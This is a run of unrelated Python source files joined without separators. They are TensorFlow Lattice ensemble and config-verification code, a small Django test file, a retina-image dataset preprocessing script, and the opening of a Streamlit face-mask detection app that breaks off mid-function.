enumerate(lattice): if within_lattice_index_1 > within_lattice_index_0: l2 = [0] * len(lattice) l2[within_lattice_index_0] = 1 l2[within_lattice_index_1] = 1 torsion = lattice_lib.torsion_regularizer( weights=weights, lattice_sizes=lattice_sizes, l2=l2) torsions[feature_0][feature_1].append(torsion) torsions[feature_1][feature_0].append(torsion) if not tf.executing_eagerly(): with tf.compat.v1.Session() as sess: laplacians = sess.run(laplacians) torsions = sess.run(torsions) laplacians = [np.mean(v) for v in laplacians] torsions = [[np.mean(v) if v else 0.0 for v in row] for row in torsions] return torsions, laplacians def _get_final_crystal_lattices(model_config, prefitting_model_config, prefitting_model, feature_names): """Extracts the lattice ensemble structure from the prefitting model.""" torsions, laplacians = _get_torsions_and_laplacians( prefitting_model_config=prefitting_model_config, prefitting_model=prefitting_model, feature_names=feature_names) # Calculate features' importance_score = lambda * laplacians + torsion. # Used to allocate slots to useful features with more non-linear interactions. num_features = len(feature_names) importance_scores = np.array(laplacians) * _LAPLACIAN_WEIGHT_IN_IMPORTANCE for feature_0, feature_1 in itertools.combinations(range(num_features), 2): importance_scores[feature_0] += torsions[feature_0][feature_1] importance_scores[feature_1] += torsions[feature_0][feature_1] # Each feature is used at least once, and the remaining slots are distributed # proportional to the importance_scores. features_uses = [1] * num_features total_feature_use = model_config.num_lattices * model_config.lattice_rank remaining_uses = total_feature_use - num_features remaining_scores = np.sum(importance_scores) for feature in np.argsort(-importance_scores): added_uses = int( round(remaining_uses * importance_scores[feature] / remaining_scores)) # Each feature cannot be used more than once in a finalized lattice. added_uses = min(added_uses, model_config.num_lattices - 1) features_uses[feature] += added_uses remaining_uses -= added_uses remaining_scores -= importance_scores[feature] assert np.sum(features_uses) == total_feature_use # Add features to add list in round-robin order. add_list = [] for use in range(1, max(features_uses) + 1): for feature_index, feature_use in enumerate(features_uses): if use <= feature_use: add_list.append(feature_index) assert len(add_list) == total_feature_use # Setup initial lattices that will be optimized by swapping later. lattices = [[] for _ in range(model_config.num_lattices)] cooccurrence_counts = [[0] * num_features for _ in range(num_features)] for feature_to_be_added in add_list: # List of pairs of (addition_score, candidate_lattice_to_add_to). score_candidates_pairs = [] for candidate_lattice_to_add_to in range(model_config.num_lattices): # addition_score indicates the priority of an addition. if len( lattices[candidate_lattice_to_add_to]) >= model_config.lattice_rank: # going out of bound on the lattice addition_score = -2.0 elif feature_to_be_added in lattices[candidate_lattice_to_add_to]: # repeates (fixed repeats later by swapping) addition_score = -1.0 elif not lattices[candidate_lattice_to_add_to]: # adding a new lattice roughly has an "average" lattice score addition_score = np.mean(torsions) * model_config.lattice_rank**2 / 2 else: # all other cases: change in total discounted torsion after addition. addition_score = 0.0 for other_feature in lattices[candidate_lattice_to_add_to]: addition_score += ( torsions[feature_to_be_added][other_feature] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE **(cooccurrence_counts[feature_to_be_added][other_feature])) score_candidates_pairs.append( (addition_score, candidate_lattice_to_add_to)) # Use the highest scoring addition. score_candidates_pairs.sort(reverse=True) best_candidate_lattice_to_add_to = score_candidates_pairs[0][1] for other_feature in lattices[best_candidate_lattice_to_add_to]: cooccurrence_counts[feature_to_be_added][other_feature] += 1 cooccurrence_counts[other_feature][feature_to_be_added] += 1 lattices[best_candidate_lattice_to_add_to].append(feature_to_be_added) # Apply swapping operations to increase within-lattice torsion. changed = True iteration = 0 while changed: if iteration > _MAX_CRYSTALS_SWAPS: logging.info('Crystals algorithm did not fully converge.') break changed = False iteration += 1 for lattice_0, lattice_1 in itertools.combinations(lattices, 2): # For every pair of lattices: lattice_0, lattice_1 for index_0, index_1 in itertools.product( range(len(lattice_0)), range(len(lattice_1))): # Consider swapping lattice_0[index_0] with lattice_1[index_1] rest_lattice_0 = list(lattice_0) rest_lattice_1 = list(lattice_1) feature_0 = rest_lattice_0.pop(index_0) feature_1 = rest_lattice_1.pop(index_1) if feature_0 == feature_1: continue # Calculate the change in the overall discounted sum of torsion terms. added_cooccurrence = set( [tuple(sorted((feature_1, other))) for other in rest_lattice_0] + [tuple(sorted((feature_0, other))) for other in rest_lattice_1]) removed_cooccurrence = set( [tuple(sorted((feature_0, other))) for other in rest_lattice_0] + [tuple(sorted((feature_1, other))) for other in rest_lattice_1]) wash = added_cooccurrence.intersection(removed_cooccurrence) added_cooccurrence = added_cooccurrence.difference(wash) removed_cooccurrence = removed_cooccurrence.difference(wash) swap_diff_torsion = ( sum(torsions[i][j] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE** cooccurrence_counts[i][j] for (i, j) in added_cooccurrence) - sum(torsions[i][j] * _REPEATED_PAIR_DISCOUNT_IN_CRYSTALS_SCORE** (cooccurrence_counts[i][j] - 1) for (i, j) in removed_cooccurrence)) # Swap if a feature is repeated or if the score change is positive. if (feature_0 not in lattice_1 and feature_1 not in lattice_0 and (lattice_0.count(feature_0) > 1 or lattice_1.count(feature_1) > 1 or swap_diff_torsion > 0)): for (i, j) in added_cooccurrence: cooccurrence_counts[i][j] += 1 cooccurrence_counts[j][i] += 1 for (i, j) in removed_cooccurrence: cooccurrence_counts[i][j] -= 1 cooccurrence_counts[j][i] -= 1 lattice_0[index_0], lattice_1[index_1] = (lattice_1[index_1], lattice_0[index_0]) changed = True # Return the extracted lattice structure. return lattices def set_crystals_lattice_ensemble(model_config, prefitting_model_config, prefitting_model, feature_names=None): """Extracts crystals from a prefitting model and finalizes model_config. Args: model_config: Model configuration object describing model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` instance. prefitting_model_config: Model configuration object describing prefitting model architecture. Should be a `tfl.configs.CalibratedLatticeEnsemble` insance constructed using `tfl.premade_lib.construct_prefitting_model_config`. prefitting_model: A trained `tfl.premade.CalibratedLatticeEnsemble`, `tfl.estimators.CannedEstimator`, `tfl.estimators.CannedClassifier`, or `tfl.estiamtors.CannedRegressor` instance. feature_names: A list of feature names. If not provided, feature names will be extracted from the feature configs contained in the model_config. """ # Error checking parameter types. if not isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError( 'model_config must be a tfl.configs.CalibratedLatticeEnsembleConfig: {}' .format(type(model_config))) if not isinstance(prefitting_model_config, configs.CalibratedLatticeEnsembleConfig): raise ValueError('prefitting_model_config must be a ' 'tfl.configs.CalibratedLatticeEnsembleConfig: {}'.format( type(model_config))) if model_config.lattices != 'crystals': raise ValueError('model_config.lattices must be set to \'crystals\'.') # Note that we cannot check the type of the prefitting model without importing # premade/estimators, which would cause a cyclic dependency. However, we can # check that the model is a tf.keras.Model or tf.Estimator instance that has # the proper input layers matching prefitting_model_config feature_configs. # Beyond that, a prefitting_model with proper input layer names that is not of # the proper type will have undefined behavior. # To perform this check, we must first extract feature names if they are not # provided, which we need for later steps anyway. if feature_names is None: if model_config.feature_configs is None: raise ValueError( 'Feature configs must be specified if feature names are not provided.' ) feature_names = [ feature_config.name for feature_config in model_config.feature_configs ] _verify_prefitting_model(prefitting_model, feature_names) # Now we can extract the crystals and finalize model_config. lattices = _get_final_crystal_lattices( model_config=model_config, prefitting_model_config=prefitting_model_config, prefitting_model=prefitting_model, feature_names=feature_names) model_config.lattices = [[ feature_names[features_index] for features_index in lattice ] for lattice in lattices] def _verify_ensemble_config(model_config): """Verifies that an ensemble model and feature configs are properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If `model_config.lattices` is set to 'rtl_layer' and `model_config.num_lattices` is not specified. ValueError: If `model_config.num_lattices < 2`. ValueError: If `model_config.lattices` is set to 'rtl_layer' and `lattice_size` is not the same for all features. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with unimodality constraints. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with trust constraints. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are features with dominance constraints. ValueError: If `model_config.lattices` is set to 'rtl_layer' and there are per-feature lattice regularizers. ValueError: If `model_config.lattices` is not iterable or constaints non-string values. ValueError: If `model_config.lattices` is not set to 'rtl_layer' or a fully specified list of lists of feature names. """ if model_config.lattices == 'rtl_layer': # RTL must have num_lattices specified and >= 2. if model_config.num_lattices is None: raise ValueError('model_config.num_lattices must be specified when ' 'model_config.lattices is set to \'rtl_layer\'.') if model_config.num_lattices < 2: raise ValueError( 'CalibratedLatticeEnsemble must have >= 2 lattices. For single ' 'lattice models, use CalibratedLattice instead.') # Check that all lattices sizes for all features are the same. if any(feature_config.lattice_size != model_config.feature_configs[0].lattice_size for feature_config in model_config.feature_configs): raise ValueError('RTL Layer must have the same lattice size for all ' 'features.') # Check that there are only monotonicity and bound constraints. if any( feature_config.unimodality != 'none' and feature_config.unimodality != 0 for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support unimodality constraints.') if any(feature_config.reflects_trust_in is not None for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support trust constraints.') if any(feature_config.dominates is not None for feature_config in model_config.feature_configs): raise ValueError( 'RTL Layer does not currently support dominance constraints.') # Check that there are no per-feature lattice regularizers. for feature_config in model_config.feature_configs: for regularizer_config in feature_config.regularizer_configs or []: if not regularizer_config.name.startswith( _INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'RTL Layer does not currently support per-feature lattice ' 'regularizers.') elif isinstance(model_config.lattices, list): # Make sure there are more than one lattice. If not, tell user to use # CalibratedLattice instead. if len(model_config.lattices) < 2: raise ValueError( 'CalibratedLatticeEnsemble must have >= 2 lattices. For single ' 'lattice models, use CalibratedLattice instead.') for lattice in model_config.lattices: if (not np.iterable(lattice) or any(not isinstance(x, str) for x in lattice)): raise ValueError( 'Lattices are not fully specified for ensemble config.') else: raise ValueError( 'Lattices are not fully specified for ensemble config. Lattices must ' 'be set to \'rtl_layer\' or be fully specified as a list of lists of ' 'feature names.') def _verify_kronecker_factored_config(model_config): """Verifies that a kronecker_factored model_config is properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If there are lattice regularizers. ValueError: If there are per-feature lattice regularizers. ValueError: If there are unimodality constraints. ValueError: If there are trust constraints. ValueError: If there are dominance constraints. """ for regularizer_config in model_config.regularizer_configs or []: if not regularizer_config.name.startswith(_INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'KroneckerFactoredLattice layer does not currently support ' 'lattice regularizers.') for feature_config in model_config.feature_configs: for regularizer_config in feature_config.regularizer_configs or []: if not regularizer_config.name.startswith( _INPUT_CALIB_REGULARIZER_PREFIX): raise ValueError( 'KroneckerFactoredLattice layer does not currently support ' 'per-feature lattice regularizers.') # Check that all lattices sizes for all features are the same. if any(feature_config.lattice_size != model_config.feature_configs[0].lattice_size for feature_config in model_config.feature_configs): raise ValueError('KroneckerFactoredLattice layer must have the same ' 'lattice size for all features.') # Check that there are only monotonicity and bound constraints. if any( feature_config.unimodality != 'none' and feature_config.unimodality != 0 for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support unimodality ' 'constraints.') if any(feature_config.reflects_trust_in is not None for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support trust ' 'constraints.') if any(feature_config.dominates is not None for feature_config in model_config.feature_configs): raise ValueError( 'KroneckerFactoredLattice layer does not currently support dominance ' 'constraints.') def _verify_aggregate_function_config(model_config): """Verifies that an aggregate function model_config is properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If `middle_dimension < 1`. ValueError: If `model_config.middle_monotonicity` is not None and `model_config.middle_calibration` is not True. """ if model_config.middle_dimension < 1: raise ValueError('Middle dimension must be at least 1: {}'.format( model_config.middle_dimension)) if (model_config.middle_monotonicity is not None and not model_config.middle_calibration): raise ValueError( 'middle_calibration must be true when middle_monotonicity is ' 'specified.') def _verify_feature_config(feature_config): """Verifies that feature_config is properly specified. Args: feature_config: Feature configuration object describing an input feature to a model. Should be an instance of `tfl.configs.FeatureConfig`. Raises: ValueError: If `feature_config.pwl_calibration_input_keypoints` is not iterable or contains non-{int/float} values for a numerical feature. ValueError: If `feature_config.monotonicity` is not an iterable for a categorical feature. ValueError: If any element in `feature_config.monotonicity` is not an iterable for a categorical feature. ValueError: If any value in any element in `feature_config.monotonicity` is not an int for a categorical feature. ValueError: If any value in any element in `feature_config.monotonicity` is not in the range `[0, feature_config.num_buckets]` for a categorical feature. """ if not feature_config.num_buckets: # Validate PWL Calibration configuration. if (not np.iterable(feature_config.pwl_calibration_input_keypoints) or any(not isinstance(x, (int, float)) for x in feature_config.pwl_calibration_input_keypoints)): raise ValueError('Input keypoints are invalid for feature {}: {}'.format( feature_config.name, feature_config.pwl_calibration_input_keypoints)) elif feature_config.monotonicity and feature_config.monotonicity != 'none': # Validate Categorical Calibration configuration. if not np.iterable(feature_config.monotonicity): raise ValueError('Monotonicity is not a list for feature {}: {}'.format( feature_config.name, feature_config.monotonicity)) for i, t in enumerate(feature_config.monotonicity): if not np.iterable(t): raise ValueError( 'Element {} is not a list/tuple for feature {} monotonicty: {}' .format(i, feature_config.name, t)) for j, val in enumerate(t): if not isinstance(val, int): raise ValueError( 'Element {} for list/tuple {} for feature {} monotonicity is ' 'not an index: {}'.format(j, i, feature_config.name, val)) if val < 0 or val >= feature_config.num_buckets: raise ValueError( 'Element {} for list/tuple {} for feature {} monotonicity is ' 'an invalid index not in range [0, num_buckets - 1]: {}'.format( j, i, feature_config.name, val)) def verify_config(model_config): """Verifies that the model_config and feature_configs are properly specified. Args: model_config: Model configuration object describing model architecture. Should be one of the model configs in `tfl.configs`. Raises: ValueError: If `model_config.feature_configs` is None. ValueError: If `model_config.output_initialization` is not iterable or contains non-{int/float} values. """ if model_config.feature_configs is None: raise ValueError('Feature configs must be fully specified.') if isinstance(model_config, configs.CalibratedLatticeEnsembleConfig): _verify_ensemble_config(model_config) if ((isinstance(model_config, configs.CalibratedLatticeEnsembleConfig) or isinstance(model_config, configs.CalibratedLatticeConfig)) and model_config.parameterization == 'kronecker_factored'): _verify_kronecker_factored_config(model_config) if isinstance(model_config, configs.AggregateFunctionConfig): _verify_aggregate_function_config(model_config) for feature_config in model_config.feature_configs: _verify_feature_config(feature_config) if (not np.iterable(model_config.output_initialization) or any(not isinstance(x, (int, float)) for x in model_config.output_initialization)): raise ValueError('Output initilization is invalid: {}'.format( model_config.output_initialization)) import pytest pytestmark = pytest.mark.django_db def test_robots_txt(client, snapshot): response = client.get("/robots.txt") assert response.status_code == 200 snapshot.assert_match(response.content) def test_ping(client, snapshot): response = client.get("/ping") assert response.status_code == 200 snapshot.assert_match(response.content) kalyan-iiitbh/ML-Retina10-100 # Copyright 2019-2020 . All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== from absl import app import logging import logging.config import time import csv import cv2 import os import numpy as np import glob class NumpyDataGenerator: def __init__(self, training_path, testing_path, csv_path, csv_testing_path, augmented_path, csv_augmented_file): self.training_path = training_path self.testing_path = testing_path self.csv_path = csv_path self.csv_testing_path = csv_testing_path self.logger = logging.getLogger('odir') self.total_records_training = 0 self.total_records_testing = 0 self.csv_augmented_path = csv_augmented_file self.augmented_path = augmented_path def npy_training_files(self, file_name_training, file_name_training_labels): training = [] training_labels = [] self.logger.debug("Opening CSV file") with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # save numpy array as .npy formats np.save(file_name_training, training) self.logger.debug("Saving NPY File: " + file_name_training) np.save(file_name_training_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_training_labels) self.logger.debug("Closing CSV file") def npy_testing_files(self, file_name_testing, file_name_testing_labels): testing = [] testing_labels = [] self.logger.debug("Opening CSV file") with open(self.csv_testing_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_testing = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id + "_left.jpg") # load first the image from the folder eye_image = os.path.join(self.testing_path, column_id + "_left.jpg") image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) testing.append(image) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = self.total_records_testing + 1 self.logger.debug("Processing image: " + column_id + "_right.jpg") eye_image = os.path.join(self.testing_path, column_id + "_right.jpg") image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) testing.append(image) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = self.total_records_testing + 1 testing = np.array(testing, dtype='uint8') training_labels = np.array(testing_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) testing = np.reshape(testing, [testing.shape[0], testing.shape[1], testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) self.logger.debug("Saving NPY File: " + file_name_testing) np.save(file_name_testing_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_testing_labels) self.logger.debug("Closing CSV file") def npy_training_files_split(self, split_number, file_name_training, file_name_training_labels, file_name_testing, file_name_testing_labels): training = [] training_labels = [] testing = [] testing_labels = [] self.logger.debug("Opening CSV file") count = 0 with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 self.total_records_testing = 0 for row in csv_reader: column_id = row[0] label = row[1] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if count < split_number: testing.append(image) testing_labels.append(label) self.total_records_testing = self.total_records_testing + 1 else: training.append(image) training_labels.append(label) self.total_records_training = self.total_records_training + 1 count = count + 1 testing = np.array(testing, dtype='uint8') testing_labels = np.array(testing_labels, dtype='uint8') testing = np.reshape(testing, [testing.shape[0], testing.shape[1], testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) np.save(file_name_testing_labels, testing_labels) training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # save numpy array as .npy formats np.save(file_name_training, training) self.logger.debug("Saving NPY File: " + file_name_training) np.save(file_name_training_labels, training_labels) self.logger.debug("Saving NPY File: " + file_name_training_labels) self.logger.debug("Closing CSV file") def is_sickness(self, row, sickness): switcher = { "normal": row[1] == '1' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "diabetes": row[1] == '0' and row[2] == '1' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "glaucoma": row[1] == '0' and row[2] == '0' and row[3] == '1' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "cataract": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '1' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "amd": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '1' and row[ 6] == '0' and row[7] == '0' and row[8] == '0', "hypertension": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[6] == '1' and row[7] == '0' and row[8] == '0', "myopia": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '1' and row[8] == '0', "others": row[1] == '0' and row[2] == '0' and row[3] == '0' and row[4] == '0' and row[5] == '0' and row[ 6] == '0' and row[7] == '0' and row[8] == '1' } return switcher.get(sickness, False) def npy_training_files_split_all(self, split_number, file_name_training, file_name_training_labels, file_name_testing, file_name_testing_labels, include_augmented): split_factor = 10820 training = [] training_labels = [] training_2 = [] training_labels_2 = [] testing = [] testing_labels = [] images_used = [] count_images = 0 class_names = ['normal', 'diabetes', 'glaucoma', 'cataract', 'amd', 'hypertension', 'myopia', 'others'] self.logger.debug("Opening CSV file") class_count = {'normal': 0, 'diabetes': 0, 'glaucoma': 0, 'cataract': 0, 'amd': 0, 'hypertension': 0, 'myopia': 0, 'others': 0} split_pocket = split_number / 8 with open(self.csv_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) self.total_records_training = 0 self.total_records_testing = 0 for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.training_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) found = False for sickness in class_names: if self.is_sickness(row, sickness) and class_count[sickness] < split_pocket: testing.append(image) images_used.append(row[0] + ',' + sickness + ',' + str(class_count[sickness])) testing_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_testing = self.total_records_testing + 1 class_count[sickness] = class_count[sickness] + 1 found = True logger.debug('found ' + sickness + ' ' + str(class_count[sickness])) if not found: training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 count_images = count_images + 1 if include_augmented: with open(self.csv_augmented_path) as csvDataFile: csv_reader = csv.reader(csvDataFile) for row in csv_reader: column_id = row[0] normal = row[1] diabetes = row[2] glaucoma = row[3] cataract = row[4] amd = row[5] hypertension = row[6] myopia = row[7] others = row[8] # just discard the first row if column_id != "ID": self.logger.debug("Processing image: " + column_id) # load first the image from the folder eye_image = os.path.join(self.augmented_path, column_id) image = cv2.imread(eye_image) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) if count_images >= split_factor: training_2.append(image) training_labels_2.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) else: training.append(image) training_labels.append([normal, diabetes, glaucoma, cataract, amd, hypertension, myopia, others]) self.total_records_training = self.total_records_training + 1 count_images = count_images + 1 testing = np.array(testing, dtype='uint8') testing_labels = np.array(testing_labels, dtype='uint8') testing = np.reshape(testing, [testing.shape[0], testing.shape[1], testing.shape[2], testing.shape[3]]) # save numpy array as .npy formats np.save(file_name_testing, testing) np.save(file_name_testing_labels, testing_labels) training = np.array(training, dtype='uint8') training_labels = np.array(training_labels, dtype='uint8') # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) training = np.reshape(training, [training.shape[0], training.shape[1], training.shape[2], training.shape[3]]) # convert (number of images x height x width x number of channels) to (number of images x (height * width *3)) # for example (6069 * 28 * 28 * 3)-> (6069 x 2352) (14,274,288) if include_augmented: training_2 = np.array(training_2, dtype='uint8') training_labels_2 = np.array(training_labels_2, dtype='uint8') training_2 = np.reshape(training_2, [training_2.shape[0], training_2.shape[1], training_2.shape[2], training_2.shape[3]]) self.logger.debug(testing.shape) self.logger.debug(testing_labels.shape) self.logger.debug(training.shape) self.logger.debug(training_labels.shape) if include_augmented: self.logger.debug(training_2.shape) self.logger.debug(training_labels_2.shape) # save numpy array as .npy formats np.save(file_name_training + '_1', training) np.save(file_name_training_labels + '_1', training_labels) if include_augmented: np.save(file_name_training + '_2', training_2) np.save(file_name_training_labels + '_2', training_labels_2) self.logger.debug("Closing CSV file") for sickness in class_names: self.logger.debug('found ' + sickness + ' ' + str(class_count[sickness])) csv_writer = csv.writer(open("files_used.csv", 'w', newline='')) for item in images_used: self.logger.debug(item) entries = item.split(",") csv_writer.writerow(entries) def main(argv): start = time.time() image_width = 224 training_path = r'C:\temp\ODIR-5K_Training_Dataset_treated' + '_' + str(image_width) testing_path = r'C:\temp\ODIR-5K_Testing_Images_treated' + '_' + str(image_width) augmented_path = r'C:\temp\ODIR-5K_Training_Dataset_augmented' + '_' + str(image_width) csv_file = r'ground_truth\odir.csv' csv_augmented_file = r'ground_truth\odir_augmented.csv' training_file = r'ground_truth\testing_default_value.csv' logger.debug('Generating npy files') generator = NumpyDataGenerator(training_path, testing_path, csv_file, training_file, augmented_path, csv_augmented_file) # Generate testing file generator.npy_testing_files('odir_testing_challenge' + '_' + str(image_width), 'odir_testing_labels_challenge' + '_' + str(image_width)) # Generate training file # generator.npy_training_files('odir_training', 'odir_training_labels') # generator.npy_training_files_split(1000, 'odir_training', # 'odir_training_labels', 'odir_testing', 'odir_testing_labels') # generator.npy_training_files_split_all(400, 'odir_training' + '_' + str(image_width), # 'odir_training_labels' + '_' + str(image_width), # 'odir_testing' + '_' + str(image_width), # 'odir_testing_labels' + '_' + str(image_width), # True) end = time.time() logger.debug('Training Records ' + str(generator.total_records_training)) logger.debug('Testing Records ' + str(generator.total_records_testing)) logger.debug('All Done in ' + str(end - start) + ' seconds') if __name__ == '__main__': # create logger logging.config.fileConfig('logging.conf') logger = logging.getLogger('odir') app.run(main) 0 from torchvision.models.detection.faster_rcnn import FastRCNNPredictor import streamlit as st import torch import torchvision from PIL import Image from torchvision.transforms import ToTensor import matplotlib.pyplot as plt import matplotlib.patches as patches from yoloface import * import copy st.set_option('deprecation.showPyplotGlobalUse', False) device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu') def get_model_instance_segmentation(num_classes, pretrained=True): model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pretrained) model.roi_heads.box_predictor = FastRCNNPredictor(model.roi_heads.box_predictor.cls_score.in_features, num_classes) return model @st.cache(show_spinner=False) def get_mask_model(): model = get_model_instance_segmentation(3, pretrained=False) model.load_state_dict(torch.load('models/model.pt', map_location=device)) model.to(device) model.eval() return model @st.cache(allow_output_mutation=True, show_spinner=False) def get_face_model(): model_cfg = 'cfg/yolov3-face.cfg' model_weights = 'models/yolov3-wider_16000.weights' net = cv2.dnn.readNetFromDarknet(model_cfg, model_weights) net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV) net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU) return net def run_face_model(net, img): import numpy as np frame = np.asarray(img)[:, :, ::-1].copy() blob = cv2.dnn.blobFromImage(frame, 1 / 255, (IMG_WIDTH, IMG_HEIGHT), [0, 0, 0], 1, crop=False) net.setInput(blob) outs = net.forward(get_outputs_names(net)) faces = post_process(frame, outs, CONF_THRESHOLD, NMS_THRESHOLD) return faces # st.write(faces) @st.cache(allow_output_mutation=True, show_spinner=False) def run_model(img_data): with st.spinner('Loading AI model...'): mask_model = get_mask_model() face_model = get_face_model() with st.spinner('Running AI model...'): pil_img = Image.open(img_data) img = ToTensor()(pil_img).unsqueeze(0) face_pred = run_face_model(face_model, pil_img) face_pred = [face for face in face_pred if face[2] * face[3] > 300] mask_pred = mask_model(img) # filter out non-mask predictions mask_pred = [box for label, box in zip(mask_pred[0]['labels'], mask_pred[0]['boxes']) if label == 1] new_mask_pred = [] for box in mask_pred: xmin, ymin, xmax, ymax = box new_mask_pred.append((xmin.item(), ymin.item(), (xmax - xmin).item(), (ymax - ymin).item())) mask_pred = new_mask_pred return pil_img, img, mask_pred, face_pred def predict(img_data, env): pil_img, img, mask_pred, face_pred = run_model(img_data) with st.spinner('Processing Results...'): img = img[0].cpu().data fig, ax = plt.subplots(1) ax.imshow(img.permute(1, 2, 0)) bad, good = matching(mask_pred, face_pred) plot_faces_annotated(fig, ax, good, color='g') plot_faces_annotated(fig, ax, bad, color='r') ax.axis('off') st.pyplot() st.markdown(f'## **{100*len(good)/(len(good)+len(bad)):.2f}%** of Individuals are Masked') st.markdown(f'## COVID Danger Score is **{round(10*len(bad)/(len(good)+len(bad))) + (1 if env == "Indoor" else 0)}**') import plotly.express as px fig = px.bar(x=['Mask', 'No Mask'], y=[len(good), len(bad)], labels={'x': 'Mask Status', 'y': '# of Detected Faces'}, title='Summary of Detections') st.plotly_chart(fig) st.success('Your image has been processed!') st.balloons() def plot_line_between_faces(fig, ax, f1, f2, text=None, color='blue'): x = [f1[0] + f1[2] / 2, f2[0] + f2[2] / 2] y = [f1[1] + f1[3] / 2, f2[1] + f2[3] / 2] ax.plot(x, y, c=color) if text is not None: ax.text(np.mean(x), np.mean(y), text) def area(a, b): # returns None if rectangles don't intersect dx = min(a.xmax, b.xmax) - max(a.xmin, b.xmin) dy = min(a.ymax, 